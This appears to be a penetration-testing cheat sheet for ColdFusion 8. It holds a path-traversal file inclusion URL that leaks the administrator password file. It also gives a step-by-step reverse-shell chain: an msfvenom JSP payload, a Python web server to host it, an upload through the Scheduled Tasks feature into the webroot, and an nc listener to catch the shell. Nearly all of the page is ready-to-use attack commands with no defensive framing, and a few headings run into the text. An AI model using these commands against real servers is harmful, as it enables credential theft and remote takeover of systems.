Coldfusion
Basics
Local File Inclusion - Password Leak!
http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00enReverse Shell
Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp
Share:
python -m SimpleHTTPServer
python3 -m http.server
Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run
Execute:
http://$IP:8500/CFIDE/shell.jsp
Catch:
nc -nvlp 4444
whoami tolis!Webshell
Reverse Executable
Other:
Last updated